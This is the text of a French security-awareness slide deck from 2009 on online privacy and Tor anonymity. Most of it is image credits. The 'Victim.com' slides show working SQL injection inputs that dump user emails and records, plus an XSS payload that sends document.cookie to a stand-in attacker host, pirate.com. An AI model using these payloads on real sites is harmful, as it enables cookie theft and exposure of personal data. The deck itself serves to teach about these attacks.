Vous êtes sur la page 1sur 72

Vie pas si privée

Nicolas-Loïc Fortin
2009-10-28
Agenda

• Fouille dans les bas fonds d’Internet


• Camouflage des activités
Les bas fonds
Les bas fonds

CC Pro-Zak (Flickr)
Dumpster Diving

CC AlwaysHallways (Flickr)
Dans le confort

CC Ben McLeod (Flickr)


La vrai vie

CC Mightyohm (Flickr)
Victim.com
informations public (page de contact)

Failles XSS
Injections SQL
...
Et plus encore...
Liste de courriels
Liste de noms
Liste de téléphones
Liste de ...
Cas réel : Injection SQL

• Victim.com/recuperer_password.php
• Entrer votre adresse courriel
• Attaque: ‘ or ‘’=’
• Résultat:
• Des milliers de emails s’affichent sur l’écran
• Ce qu’on peut faire de tout cela? ...
• Fouiller dans les bas fonds
Cas réel : Injection SQL 2

• Victim.com/users.php
• Entrer l’utilisateur a rechercher
• Attaque: ‘ or ‘’=’
• Résultat:
•Tous les noms et les détails de ceux-ci
s’affichent
Ce qu’on peut faire de tout cela? ...
• Fouiller dans les bas fond
Cas réel : Cross Site Scripting (XSS)

• Victim.com/photo.php?titre=test
• Attaque: ?titre=<script>window.open(‘http://
pirate.com/log.php?l=’+document.cookie);</script>
• Résultat:
• On vole les données de l’utilisateur
Ce qu’on peut faire de tout cela? ...
• Fouiller dans les bas fond
Démo
ISACA
Christophe Reverd
Éric Lauzon
Camouflage
Camouflage

CC Team Dalog (Flickr)


Ou les ninja du bureau

CC Dr Stephen Dann (Flickr)


Vie privée?

CC SaltGeorge (Flickr)
Vie privée?

CC SaltGeorge (Flickr)
The Onion Router

CC photobunny (Flickr)
CC A.Schwenke (Flickr)
+
CC photobunny (Flickr)
=
Un premier relais

CC HAMED MASOUMI (Flickr)


Un deuxième relais

CC James Callan (Flickr)


Un troisième relais

CC BékiPe (Flickr)
Un secret bien gardé

CC sketchr (Flickr)
Gros nez senteux

CC jacqueline-w (Flickr)
Whistle Blower

CC Leo Reynolds (Flickr)


Undercover

CC Peppysis (Flickr)
Vandalisme

CC ScottSchrantz (Flickr)
Bandistisme

CC Night-thing (Flickr)
stupidité

CC JLA Kliché (Flickr)


CC Marco Bellucci (Flickr)